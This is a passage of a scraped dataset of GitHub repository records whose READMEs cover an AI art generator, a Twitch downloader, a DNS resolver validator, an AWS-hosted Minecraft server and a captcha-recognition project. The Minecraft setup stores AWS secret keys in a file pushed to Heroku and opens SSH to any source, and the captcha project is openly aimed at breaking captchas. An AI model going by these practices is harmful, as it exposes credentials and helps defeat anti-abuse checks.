I've simply modified the original colab versions so they'll run locally and added some support for automation.\nModels currently supported, with links to their original implementations:\n * [Stable Diffusion](https://github.com/CompVis/stable-diffusion)\n * CLIP-guided Diffusion (via [Disco Diffusion](https://colab.research.google.com/github/alembics/disco-diffusion/blob/main/Disco_Diffusion.ipynb) adapted to run locally)\n * [VQGAN+CLIP](https://colab.research.google.com/github/justinjohn0306/VQGAN-CLIP/blob/main/VQGAN%2BCLIP(Updated).ipynb)\n\n# Requirements\n\nYou'll need an Nvidia GPU, preferably with a decent amount of VRAM. 12GB of VRAM is sufficient for 512x512 output images depending on model and settings, and 8GB should be enough for 384x384 (8GB should be considered a reasonable minimum!). To generate 1024x1024 images, you'll need ~24GB of VRAM or more. Generating small images and then upscaling via [ESRGAN](https://github.com/xinntao/Real-ESRGAN) or some other package provides very good results as well.\n\nIt should be possible to run on an AMD GPU, but you'll need to be on Linux to install the ROCm version of Pytorch. I don't have an AMD GPU to throw into a Linux machine so I haven't tested this myself.\n\n# Setup\n\nThese instructions were tested on a Windows 10 desktop with an Nvidia 3080 Ti GPU (12GB VRAM), and also on an Ubuntu Server 20.04.3 system with an old Nvidia Tesla M40 GPU (24GB VRAM).\n\n**[1]** Install [Anaconda](https://www.anaconda.com/products/individual), open the root terminal, and create a new environment (and activate it):\n```\nconda create --name ai-art python=3.9\nconda activate ai-art\n```\n\n**[2]** Install Pytorch:\n```\nconda install pytorch torchvision torchaudio cudatoolkit=11.3 -c pytorch\n```\nNote that you can customize your Pytorch installation by using [the online tool located here](https://pytorch.org/get-started/locally/).\n\n**[3]** Install other required Python packages:\n```\nconda install -c anaconda git urllib3\npip install transformers keyboard pillow ftfy regex tqdm omegaconf pytorch-lightning IPython kornia imageio imageio-ffmpeg einops torch_optimizer\n```\n\n**[4]** Clone this repository and switch to its directory:\n```\ngit clone https://github.com/rbbrdckybk/ai-art-generator\ncd ai-art-generator\n```\nNote that Linux users may need single quotes around the URL in the clone command.\n\n**[5]** Clone additional required repositories:\n```\ngit clone https://github.com/openai/CLIP\ngit clone https://github.com/CompVis/taming-transformers\n```\n\n**[6]** Download the default VQGAN pre-trained model checkpoint files:\n```\nmkdir checkpoints\ncurl -L -o checkpoints/vqgan_imagenet_f16_16384.yaml -C - \"https://heibox.uni-heidelberg.de/d/a7530b09fed84f80a887/files/?p=%2Fconfigs%2Fmodel.yaml&dl=1\"\ncurl -L -o checkpoints/vqgan_imagenet_f16_16384.ckpt -C - \"https://heibox.uni-heidelberg.de/d/a7530b09fed84f80a887/files/?p=%2Fckpts%2Flast.ckpt&dl=1\"\n```\nNote that Linux users should replace the double quotes in the curl commands with single quotes.\n\n**[7]** (Optional) Download additional pre-trained models: \nAdditional models are not necessary, but provide you with more options. [Here is a good list of available pre-trained models](https://github.com/CompVis/taming-transformers#overview-of-pretrained-models). 
\nFor example, if you also wanted the FFHQ model (trained on faces): \n```\ncurl -L -o checkpoints/ffhq.yaml -C - \"https://app.koofr.net/content/links/0fc005bf-3dca-4079-9d40-cdf38d42cd7a/files/get/2021-04-23T18-19-01-project.yaml?path=%2F2021-04-23T18-19-01_ffhq_transformer%2Fconfigs%2F2021-04-23T18-19-01-project.yaml&force\"\ncurl -L -o checkpoints/ffhq.ckpt -C - \"https://app.koofr.net/content/links/0fc005bf-3dca-4079-9d40-cdf38d42cd7a/files/get/last.ckpt?path=%2F2021-04-23T18-19-01_ffhq_transformer%2Fcheckpoints%2Flast.ckpt\"\n```\n\n**[8]** (Optional) Test VQGAN+CLIP: \n```\npython vqgan.py -s 128 128 -i 200 -p \"a red apple\" -o output/output.png\n```\nYou should see output.png created in the output directory, which should loosely resemble an apple.\n\n**[9]** Install packages for CLIP-guided diffusion (if you're only interested in VQGAN+CLIP, you can skip everything from here to the end): \n```\npip install ipywidgets omegaconf torch-fidelity einops wandb opencv-python matplotlib lpips datetime timm\nconda install pandas\n```\n\n**[10]** Clone repositories for CLIP-guided diffusion:\n```\ngit clone https://github.com/crowsonkb/guided-diffusion\ngit clone https://github.com/assafshocher/ResizeRight\ngit clone https://github.com/CompVis/latent-diffusion\n```\n\n**[11]** Download models needed for CLIP-guided diffusion:\n```\nmkdir content\\models\ncurl -L -o content/models/256x256_diffusion_uncond.pt -C - \"https://openaipublic.blob.core.windows.net/diffusion/jul-2021/256x256_diffusion_uncond.pt\"\ncurl -L -o content/models/512x512_diffusion_uncond_finetune_008100.pt -C - \"http://batbot.tv/ai/models/guided-diffusion/512x512_diffusion_uncond_finetune_008100.pt\"\ncurl -L -o content/models/secondary_model_imagenet_2.pth -C - \"https://ipfs.pollinations.ai/ipfs/bafybeibaawhhk7fhyhvmm7x24zwwkeuocuizbqbcg5nqx64jq42j75rdiy/secondary_model_imagenet_2.pth\"\nmkdir content\\models\\superres\ncurl -L -o content/models/superres/project.yaml -C - \"https://heibox.uni-heidelberg.de/f/31a76b13ea27482981b4/?dl=1\"\ncurl -L -o content/models/superres/last.ckpt -C - \"https://heibox.uni-heidelberg.de/f/578df07c8fc04ffbadf3/?dl=1\"\n```\nNote that Linux users should again replace the double quotes in the curl commands with single quotes, and replace the **mkdir** backslashes with forward slashes.\n\n**[12]** (Optional) Test CLIP-guided diffusion: \n```\npython diffusion.py -s 128 128 -i 200 -p \"a red apple\" -o output.png\n```\nYou should see output.png created in the output directory, which should loosely resemble an apple.\n\n**[13]** Clone Stable Diffusion repository (if you're not interested in SD, you can skip everything from here to the end):\n```\ngit clone https://github.com/rbbrdckybk/stable-diffusion\n```\n\n**[14]** Install additional dependancies required by Stable Diffusion:\n```\npip install diffusers\n```\n\n**[15]** Download the Stable Diffusion pre-trained checkpoint file:\n```\nmkdir stable-diffusion\\models\\ldm\\stable-diffusion-v1\ncurl -L -o stable-diffusion/models/ldm/stable-diffusion-v1/model.ckpt -C - \"https://huggingface.co/CompVis/stable-diffusion-v-1-4-original/resolve/main/sd-v1-4.ckpt\"\n```\n**If the curl command doesn't download the checkpoint, it's gated behind a login.** You'll need to register [here](https://huggingface.co/CompVis) (only requires email and name) and then you can download the checkpoint file [here](https://huggingface.co/CompVis/stable-diffusion-v-1-4-original/resolve/main/sd-v1-4.ckpt). 
\nAfter downloading, you'll need to place the .ckpt file in the directory created above and name it **model.ckpt**. \n\n**[16]** (Optional) Test Stable Diffusion: \nThe easiest way to test SD is to create a simple prompt file with **!PROCESS = stablediff** and a single subject. See *example-prompts.txt* and the next section for more information. Assuming you create a simple prompt file called *test.txt* first, you can test by running:\n```\npython make_art.py test.txt\n```\nImages should be saved to the **output** directory if successful (organized into subdirectories named for the date and prompt file).\n\n**[17]** Setup ESRGAN/GFPGAN (if you're not planning to upscale images, you can skip this and everything else):\n```\ngit clone https://github.com/xinntao/Real-ESRGAN\npip install basicsr facexlib gfpgan\ncd Real-ESRGAN\ncurl -L -o experiments/pretrained_models/RealESRGAN_x4plus.pth -C - \"https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth\"\npython setup.py develop\ncd ..\n```\n \nYou're done!\n \nIf you're getting errors outside of insufficient GPU VRAM while running and haven't updated your installation in awhile, try updating some of the more important packages, for example:\n```\npip install transformers -U\n```\n\n# Usage\n\nEssentially, you just need to create a text file containing the subjects and styles you want to use to generate images. If you have 5 subjects and 20 styles in your prompt file, then a total of 100 output images will be created (20 style images for each subject).\n\nTake a look at **example-prompts.txt** to see how prompt files should look. You can ignore everything except the [subjects] and [styles] areas for now. Lines beginning with a '#' are comments and will be ignored, and lines beginning with a '!' are settings directives and are explained in the next section. For now, just modify the example subjects and styles with whatever you'd like to use.\n\nAfter you've populated **example-prompts.txt** to your liking, you can simply run:\n```\npython make_art.py example-prompts.txt\n```\nDepending on your hardware and settings, each image will take anywhere from a few seconds to a few hours (on older hardware) to create. If you can run Stable Diffusion, I strongly recommend it for the best results - both in speed and image quality.\n\nOutput images are created in the **output/[current date]-[prompt file name]/** directory by default. The output directory will contain a JPG file for each image named for the subject & style used to create it. So for example, if you have \"a monkey on a motorcycle\" as one of your subjects, and \"by Picasso\" as a style, the output image will be created as output/[current date]-[prompt file name]/a-monkey-on-a-motorcycle-by-picasso.jpg (filenames will vary a bit depending on process used).\n\nYou can press **CTRL+SHIFT+P** any time to pause execution (the pause will take effect when the current image is finished rendering). Press **CTRL+SHIFT+P** again to unpause. Useful if you're running this on your primary computer and need to use your GPU for something else for awhile. You can also press **CTRL+SHIFT+R** to reload the prompt file if you've changed it (the current work queue will be discarded, and a new one will be built from the contents of your prompt file). **Note that keyboard input only works on Windows.**\n\nThe settings used to create each image are saved as metadata in each output JPG file by default. 
You can read the metadata info back by using any EXIF utility, or by simply right-clicking the image file in Windows Explorer and selecting \"properties\", then clicking the \"details\" pane. The \"comments\" field holds the command used to create the image.\n\n# Advanced Usage\n\nDirectives can be included in your prompt file to modify settings for all prompts that follow it. These settings directives are specified by putting them on their own line inside of the [subject] area of the prompt file, in the following format: \n\n**![setting to change] = [new value]** \n\nFor **[setting to change]**, valid directives are: \n * PROCESS\n * CUDA_DEVICE\n * WIDTH\n * HEIGHT\n * ITERATIONS (vqgan/diffusion only)\n * CUTS (vqgan/diffusion only)\n * INPUT_IMAGE\n * SEED\n * LEARNING_RATE (vqgan only)\n * TRANSFORMER (vqgan only)\n * OPTIMISER (vqgan only)\n * CLIP_MODEL (vqgan only)\n * D_VITB16, D_VITB32, D_RN101, D_RN50, D_RN50x4, D_RN50x16 (diffusion only)\n * STEPS (stablediff only)\n * CHANNELS (stablediff only)\n * SAMPLES (stablediff only)\n * STRENGTH (stablediff only)\n * SD_LOW_MEMORY (stablediff only)\n * USE_UPSCALE (stablediff only)\n * UPSCALE_AMOUNT (stablediff only)\n * UPSCALE_FACE_ENH (stablediff only)\n * UPSCALE_KEEP_ORG (stablediff only)\n * REPEAT\n\nSome examples: \n```\n!PROCESS = vqgan\n```\nThis will set the current AI image-generation process. Valid options are **vqgan** for VQGAN+CLIP, **diffusion** for CLIP-guided diffusion (Disco Diffusion), or **stablediff** for Stable Diffusion.\n```\n!CUDA_DEVICE = 0\n```\nThis will force GPU 0 be to used (the default). Useful if you have multiple GPUs - you can run multiple instances, each with it's own prompt file specifying a unique GPU ID.\n```\n!WIDTH = 384\n!HEIGHT = 384\n```\nThis will set the output image size to 384x384. A larger output size requires more GPU VRAM. Note that for Stable Diffusion these values should be multiples of 64.\n```\n!TRANSFORMER = ffhq\n```\nThis will tell VQGAN to use the FFHQ transformer (somewhat better at faces), instead of the default (vqgan_imagenet_f16_16384). You can follow step 7 in the setup instructions above to get the ffhq transformer, along with a link to several others.\n\nWhatever you specify here MUST exist in the checkpoints directory as a .ckpt and .yaml file.\n```\n!INPUT_IMAGE = samples/face-input.jpg\n```\nThis will use samples/face-input.jpg (or whatever image you specify) as the starting image, instead of the default random noise. Input images must be the same aspect ratio as your output images for good results. Note that when using with Stable Diffusion the output image size will be the same as your input image (your height/width settings will be ignored).\n```\n!SEED = 42\n```\nThis will use 42 as the input seed value, instead of a random number (the default). Useful for reproducibility - when all other parameters are identical, using the same seed value should produce an identical image across multiple runs. Set to nothing or -1 to reset to using a random value.\n```\n!INPUT_IMAGE = \n```\nSetting any of these values to nothing will return it to its default. So in this example, no starting image will be used.\n```\n!STEPS = 50\n```\nSets the number of steps (simliar to iterations) when using Stable Diffusion to 50 (the default). Higher values take more time and may improve image quality. Values over 100 rarely produce noticeable differences compared to lower values.\n```\n!SCALE = 7.5\n```\nSets the guidance scale when using Stable Diffusion to 7.5 (the default). 
Higher values (to a point, beyond ~25 results may be strange) will cause the the output to more closely adhere to your prompt.\n```\n!SAMPLES = 1\n```\nSets the number of times to sample when using Stable Diffusion to 1 (the default). Values over 1 will cause multiple output images to be created for each prompt at a slight time savings per image. There is no cost in GPU VRAM required for incrementing this.\n```\n!STRENGTH = 0.75\n```\nSets the influence of the starting image to 0.75 (the default). Only relevant when using Stable Diffusion with an input image. Valid values are between 0-1, with 1 corresponding to complete destruction of the input image, and 0 corresponding to leaving the starting image completely intact. Values between 0.25 and 0.75 tend to give interesting results.\n```\n!SD_LOW_MEMORY = no\n```\nUse a forked repo with much lower GPU memory requirements when using Stable Diffusion (yes/no)? Setting this to **yes** will switch over to using a memory-optimized version of SD that will allow you to create higher resolution images with far less GPU memory (512x512 images should only require around 4GB of VRAM). The trade-off is that inference is **much** slower compared to the default official repo. For comparison: on a RTX 3060, a 512x512 image at default settings takes around 12 seconds to create; with *!SD_LOW_MEMORY = yes*, the same image takes over a minute. Recommend keeping this off unless you have under 8GB GPU VRAM, or want to experiment with creating larger images before upscaling.\n```\n!USE_UPSCALE = no\n```\nAutomatically upscale images created with Stable Diffusion (yes/no)? Uses ESRGAN/GFPGAN (see additional settings below).\n```\n!UPSCALE_AMOUNT = 2\n```\nHow much to scale when *!USE_UPSCALE = yes*. Default is 2.0x; higher values require more VRAM and time.\n```\n!UPSCALE_FACE_ENH = no\n```\nWhether or not to use GFPGAN (vs default ESRGAN) when upscaling. GFPGAN provides the best results with faces, but may provide slightly worse results if used on non-face subjects.\n```\n!UPSCALE_KEEP_ORG = no\n```\nKeep the original unmodified image when upscaling (yes/no)? If set to no (the default), the original image will be deleted. If set to yes, the original image will be saved in an **/original** subdirectory of the image output folder.\n```\n!REPEAT = no\n```\nWhen all jobs in the prompt file are finished, restart back at the top of the file (yes/no)? 
Default is no, which will simply terminate execution when all jobs are complete.\n\nTODO: finish settings examples & add usage tips/examples, document random_art.py\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ihabunek/twitch-dl", "link": "https://github.com/ihabunek/twitch-dl", "tags": ["twitch", "download-videos", "cli"], "stars": 512, "description": "CLI tool for downloading videos from Twitch.", "lang": "Python", "repo_lang": "", "readme": "Twitch Downloader\n=================\n\nCLI tool for downloading videos from twitch.tv\n\nInspired by [youtube-dl](https://youtube-dl.org/) but improves upon it by using\nmultiple concurrent connections to make the download faster.\n\nResources\n---------\n\n* [Documentation](https://twitch-dl.bezdomni.net/)\n* [Source code](https://github.com/ihabunek/twitch-dl)\n* [Issues](https://github.com/ihabunek/twitch-dl/issues)\n* [Python package](https://pypi.org/project/twitch-dl/)\n\nRequirements\n------------\n\n* Python 3.7 or later\n* [ffmpeg](https://ffmpeg.org/download.html), installed and on the system path\n\nQuick start\n-----------\n\nSee [installation instructions](https://twitch-dl.bezdomni.net/installation.html)\nto set up twitch-dl.\n\nList videos from a channel.\n\n```\ntwitch-dl videos bananasaurus_rex\n```\n\nList clips from a channel.\n\n```\ntwitch-dl clips bananasaurus_rex\n```\n\nDownload a video by URL.\n\n```\ntwitch-dl download https://www.twitch.tv/videos/1418494769\n```\n\nor by ID\n\n```\ntwitch-dl download 1418494769\n```\n\nDownload a clip by URL\n\n```\ntwitch-dl download https://www.twitch.tv/bananasaurus_rex/clip/PlacidColdClipsdadDeIlluminati-hL2s_aLE4CHvVN4J\n```\n\nor by slug\n\n```\ntwitch-dl download PlacidColdClipsdadDeIlluminati-hL2s_aLE4CHvVN4J\n```\n\nFor more info see [the documentation](https://twitch-dl.bezdomni.net/usage.html).\n\nLicense\n-------\n\nCopyright 2018-2022 Ivan Habunek \n\nLicensed under the GPLv3: http://www.gnu.org/licenses/gpl-3.0.html\n\nUseful links for dev\n--------------------\n\n* https://supersonichub1.github.io/twitch-graphql-api/index.html\n* https://github.com/SuperSonicHub1/twitch-graphql-api\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vortexau/dnsvalidator", "link": "https://github.com/vortexau/dnsvalidator", "tags": [], "stars": 512, "description": "Maintains a list of IPv4 DNS servers by verifying them against baseline servers, and ensuring accurate responses.", "lang": "Python", "repo_lang": "", "readme": "# DNS Validator\nMaintains a list of IPv4 DNS servers by verifying them against baseline servers, and ensuring accurate responses.\n\n[![Python 3.2|3.6](https://img.shields.io/badge/python-3.2|3.6-green.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPL3-_red.svg)](https://www.gnu.org/licenses/gpl-3.0.en.html) \n[![Twitter](https://img.shields.io/badge/twitter-@vortexau-blue.svg)](https://twitter.com/vortexau)\n[![Twitter](https://img.shields.io/badge/twitter-@codingo__-blue.svg)](https://twitter.com/codingo_) \n\n![DNSValidator](https://github.com/vortexau/dnsvalidator/blob/master/.github/dnsvalidator.png)\n\nDNS Validator's approach is different to other DNS query validation tools. 
This tool performs multiple validation steps on each resolver:\n\n* Baselines non-geolocated domain names against \"trusted\" public DNS resolvers, `1.1.1.1`, `8.8.8.8` and `9.9.9.9` \n * For each resolver being tested DNS Validator ensures that each baselined domain name resolves to the same IP Address.\n * Servers that return an answer that differs from the baseline are immediately skipped\n* Performs DNS lookup of known commonly spoofed DNS addresses to ensure NXDOMAIN is returned when expected.\n * Resolvers that do not return NXDOMAIN for random subdomains of known target domains are immediately skipped.\n\n# Usage\n\n| Argument | Description |\n|------------|--------------------------------------------------------------------------------------------------------------|\n| (stdin) | Pipe target lists from another application to verify. |\n| -t | Specify a target DNS server to verify. |\n| -tL | Specify a list of targets or a URL to a list of targets |\n| -e | Specify a target exclusion. |\n| -eL | Specify a list of targets or a URL to a list of targets to exclude. |\n| -r | Specify a root domain to compare to. Must be non-geolocated or most resolvers will fail. |\n| -q | Specify a resolver query to use (default:dnsvalidator) |\n| -threads | Specify the maximum number of threads to run at any one time (DEFAULT:5) |\n| -timeout | Specify a timeout value in seconds for any single thread (DEFAULT:600) |\n| -o | Specify an output file to write successful output to. |\n| --no-color | If set then any foreground or background colours will be stripped out |\n| --silent | If set then only successfully resolved servers will be displayed and banners and other information will be redacted. |\n| -v | If set then verbose output will be displayed in the terminal. |\n\n# Setup\nInstall using:\n```\n$ python3 setup.py install\n```\nDependencies will then be installed and DNS Validator will be added to your path as `dnsvalidator`.\n\n# Examples:\n\n## CLI:\n\n```bash\n$ dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 20 -o resolvers.txt\n```\n\n## Docker:\n\nBuild \n\n```bash\n$ docker build -t dnsvalidator .\n```\n\nRun:\n\n```bash\n$ docker run -v $(pwd):/dnsvalidator/output -t dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 20 -o /dnsvalidator/output/resolvers.txt\n```\n\n# Caveats\n\n* **WARNING** Keep the thread count to a reasonable level and/or use a VPS/VPN appropriately. Pushing the thread count too high can make it look like you are attempting to attack DNS servers, resulting in network level DNS blocks from your ISP. _Ask us how we know..._ \n* Root domains used for baseline tests must not be geolocated; specifically they must return the same IP address regardless of the location on the planet they are resolved from. Domains such as `google.com` or `facebook.com` (and many others) are not suitable for baselines, as they return a geo-located IP address when resolved.\n * Using a root domain that is geo-located will result in only resolvers local to the user being returned as valid.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "trevor-laher/OnDemandMinecraft", "link": "https://github.com/trevor-laher/OnDemandMinecraft", "tags": [], "stars": 512, "description": "An AWS hosted Minecraft server that will only run when players are active. 
Players can start the server through a simple UI accessed through free Heroku server hosting.", "lang": "Python", "repo_lang": "", "readme": "# On Demand Minecraft Server\nUsing a Python Flask application and AWS, this repository launches an AWS EC2 Instance to host a Minecraft server upon request from users through the web application. The server will automatically shut down after the server has crashed or is empty for 15 minutes. This makes server hosting for small communities very inexpensive. For up to 20 players you can expect $0.02 per hour the server runs. The largest benefit of this system is that the server bill diminishes if your community decides to take a break from the game, and will be ready to pick back up when you want to play again. No subscriptions are required.\n\nNote that this configuration will likely require familiarity with programming, SSH, and the command line.\n\n\n# AWS Setup\nThis step will properly configure your AWS account and configuration.py file so that an instance can be created via the createInstance.py script.\n\n 1. Create or access an **AWS Account**. Under the **User Dropdown** in the **Toolbar**, select **Security Credentials**, then **Access Keys**, and finally **Create New Access Key**. Download this file, open it, and copy the values of **AWSAccessKeyId** and **AWSSecretKey** to **ACCESS_KEY** and **SECRET_KEY** in the **configuration.py** file in the root directory of the repository.\n\t\n\tACCESS_KEY = 'YourAWSAccessKeyIdHere'\n\tSECRET_KEY = 'YourAWSSecretKeyHere' \n\n 3. Navigate to the **EC2 Dashboard** under the **Services Dropdown** and select **Security Groups** in the sidebar. Select **Create Security Group**, input **minecraft** for the **Security group name**. Create **Inbound Rules** for the following:\n\t - Type: **SSH** Protocol: **TCP** Port Range: **22** Source: **Anywhere**\n\t - Type: **Custom TCP Rule** Protocol: **TCP** Port Range: **25565** Source: **Anywhere**\n\t - Type: **Custom UDP Rule** Protocol: **UDP** Port Range: **25565** Source: **Anywhere**\n\t \n\t In **configuration.py** in the root directory, set **ec2_secgroups** to the name of the security group.\n\t \n\t ec2_secgroups = ['YourGroupNameHere']\n\n3. Under the **EC2 Dashboard** navigate to **Key Pairs** in the sidebar. Select **Create Key Pair**, provide a name and create. Move the file that is downloaded into the root directory of the project. In **configuration.py** in the root directory, set ** ec2_keypair** to the name entered, and **SSH_KEY_FILE_NAME** to the name.pem of the file downloaded.\n\n\tTHIS MIGHT BE SUBJECT TO CHANGE\n\t\tec2_keypair = 'YourKeyPairName'\n\t\tSSH_KEY_FILE_PATH = './YourKeyFileName.pem'\n\n4. This step is concerned with creating the AWS instance. View [https://docs.aws.amazon.com/general/latest/gr/rande.html](https://docs.aws.amazon.com/general/latest/gr/rande.html) (Or google AWS Regions), and copy the **Region** column for the **Region Name** of where you wish to host your server. In **configuration.py** of the root directory, set the **ec2_region** variable to the copied value.\n\n\tec2_region = \"Your-Region-Here\"\n\n5. Navigate to [https://aws.amazon.com/ec2/instance-types/](https://aws.amazon.com/ec2/instance-types/) and select one of the T3 types (with the memory and CPU you desire, I recommend 10 players/GB). Copy the value in the **Model** column. I've configured mine to use **t3.small**. 
In **configuration.py** of the root directory, set the **ec2_instancetype** variable to the copied value.\n\n\tec2_instancetype = 't3.yourSizeHere'\n\n6. Then we must select an image for the instance to boot. Navigate to [https://cloud-images.ubuntu.com/locator/ec2/](https://cloud-images.ubuntu.com/locator/ec2/), in the filter at the bottom of the screen, select your region of choice under **Zone**, pick any LTS (Latest Stable) under **Version**, under **Arch** select **amd64**, and **hvm:ebs** under **Instance Type**. Select one of the images available and copy the **AMI-ID**. In **configuration.py** of the root directory, set the **ec2_amis** variable to the copied value.\n\n\tec2_amis = ['ami-YourImageIdHere']\n\n7. At this point you should have the necessary configuration to create a new instance through the **createInstance.py** script in the **root** folder. Open a command line in the utilityScripts directory of the project, and execute:\n\n\tpip install -r requirements.txt\n\t\n\tAfter successful installation of dependencies execute:\n\n\tpython utilityScripts/createInstance.py\n\n\tCopy the **Instance ID** that is output into the terminal. In **configuration.py** of the root directory, set the **INSTANCE_ID** variable to the copied value.\n\n\tINSTANCE_ID = 'i-yourInstanceIdHere'\n\n\n# Web Application Deployment\nIn this step the project will get deployed to Heroku's free hosting. This part of the application provides a rudimentary UI and Web URL for users to start the server.\n\nBefore deployment it will be important to set the password for the server to start. In **configuration.py** of the root directory, set the **SERVER_PASSWORD** variable to the password of your choosing.\n\n SERVER_PASSWORD='YourPasswordHere'\n 1. Create or have access to a Heroku account.\n 2. Install and setup the **Heroku CLI** onto your computer. [https://devcenter.heroku.com/articles/heroku-cli#download-and-install](https://devcenter.heroku.com/articles/heroku-cli#download-and-install)\n 3. In the command line for the directory of this project, type:\n\t heroku create YourProjectNameHere\n4. Once this new project has been created, it is time to push the project to Heroku.\n\tgit push heroku master\n5. The URL to your hosted site should be: YourProjectNameHere.herokuapp.com\n6. Access your site and launch/access your server!\n\n# AWS Instance Configuration\nThis step will configure the AWS Linux server to run the minecraft server. It will include SSH connecting to the server, gaining admin privileges, installing java, directory setup, moving shell scripts onto the server, and making a CRON job for these shell scripts. Note that this step will include both an SSH client and a File Transfer client (such as FileZilla) on your PC.\n1. The first step will be to get SSH into the server instance. Using the key downloaded from AWS in the section above, add this key to PuTTY or simply access it through command line. The IP address can be obtained by entering the server password on the site, or through the EC2 Dashboard, selecting the iPV4 address from the corresponding instanceID in your configuration file. For MacOS and Linux systems\n\n\tssh -i pathToYourKeyFileHere ubuntu@IPAddress\n\n2. Make the ubuntu user admin if it isn't already with:\n \n\tadduser ubuntu sudo\n\n3. The next step will be to install JavaJDK onto your system. 
For newer versions you may enter:\n\tsudo apt install openjdk-11-jdk-headless\n\tIf this doesn't work you can use sudo apt list and search through these packages for an alternative java version.\n\n4. Open up an FTP client such as FileZilla and connect to the same address as the same user with the same IP address. Drag all files from the **instanceSetup** folder from this repository, into the root directory of the current user (probably **ubuntu**, for the purposes of these commands I will be using **ubuntu**, but feel free to replace with your own user if appropriate).\n\n5. Download the desired Minecraft server version from [https://www.minecraft.net/en-us/download/server/](https://www.minecraft.net/en-us/download/server/), rename it **server.jar** and drag it into the root directory of the user using FileZilla.\n\n6. Using the FTP client, create a new folder in the root directory of the current user called **screens** \nOR \nIn the SSH client, create a folder in the current directory with the command:\n\tsudo mkdir screens\n7. Then execute the following command:\n sudo chmod 700 /home/ubuntu\n8. Then execute the next command:\n export SCREENDIR=/home/ubuntu/screens\n9. Then execute the command:\n sudo crontab /home/ubuntu/crontab -u ubuntu\n\n\tFeel free to close the server through the AWS console or execute the command:\n\tsudo /sbin/shutdown -P +1\n\nAt this point you may restart the server from the Web Application using the password you configured. You should then be able to play!\n\n# Additional Remarks\n## Minecraft Memory Configuration\nThe server startup command does not specify memory constraints by default, but is available to be specified in Configuration.py. In the event that you configure this from an empty string, **the trailing space is required** as in the example below. Traditional minecraft server flags apply for this configuration.\nMEMORY_ALLOCATION='-Xmx1024M -Xms1024M '\n## UI Configuration\nThe title and header for the site can be changed in **/templates/index.html**. Feel free to add any more content or styling to the site, though be careful not to change any form, input, button, or script elements in the template.\n\n## Server Maintenance\nMaintaining the server is fairly straightforward and is done primarily through FileZilla. Updating the server file can be done by downloading the new server file, renaming it to **server.jar** and replacing the old file on the server. 
The world file can be backed up to your PC manually though there is no automated process at this time.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MicrocontrollersAndMore/OpenCV_3_License_Plate_Recognition_Python", "link": "https://github.com/MicrocontrollersAndMore/OpenCV_3_License_Plate_Recognition_Python", "tags": [], "stars": 512, "description": null, "lang": "Python", "repo_lang": "", "readme": "The video pretty much explains it all:\nhttps://www.youtube.com/watch?v=fJcl6Gw1D8k\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PatrickLib/captcha_recognize", "link": "https://github.com/PatrickLib/captcha_recognize", "tags": ["captcha-breaking", "python", "tensorflow", "captcha", "image-recognition-captchas"], "stars": 512, "description": "Image Recognition captcha without image segmentation \u65e0\u9700\u56fe\u7247\u5206\u5272\u7684\u9a8c\u8bc1\u7801\u8bc6\u522b", "lang": "Python", "repo_lang": "", "readme": "Introduce\n=========\n### Translation: [English](https://github.com/PatrickLib/captcha_recognize/blob/master/README.md) [\u4e2d\u6587](https://github.com/PatrickLib/captcha_recognize/blob/master/README-zhcn.md)\n\nimage recognition captchas using TensorFlow, no need image segmentation, run on ubuntu 16.04, python 2.7\n\n![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CMQVA_num717_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CMQZJ_num908_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CRGEU_num339_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CZHBN_num989_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/DZPEW_num388_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CZWED_num21_1.png)\n\naccuracy 99.7% judged by captcha_eval.py, training size 50000, after 20000 steps\ncaptcha generator: https://github.com/lepture/captcha\n\n![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1ab2s_num286.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1ezx8_num398.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1iv22_num346.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1kxw2_num940.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/3mtj9_num765.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1vuy5_num17.jpg)\n\naccuracy 52.1% judged by captcha_eval.py, training size 100000, after 200000 steps\ncaptcha generator: https://github.com/Gregwar/CaptchaBundle\n \nDependence\n==========\n### python 2.7\n### Anaconda2 4.3.1\nhttps://www.continuum.io/downloads#linux\n### TensorFlow 1.1\nhttps://github.com/tensorflow/tensorflow\n### captcha\nhttps://pypi.python.org/pypi/captcha/0.1.1\n\nUsage\n=====\n## 1.prepare captchas\nput your own captchas in **/data/train_data/** for training, **/data/valid_data/** for evaluating and **/data/test_data/** for recognize testing, images file name must be **label_\\*.jpg** or 
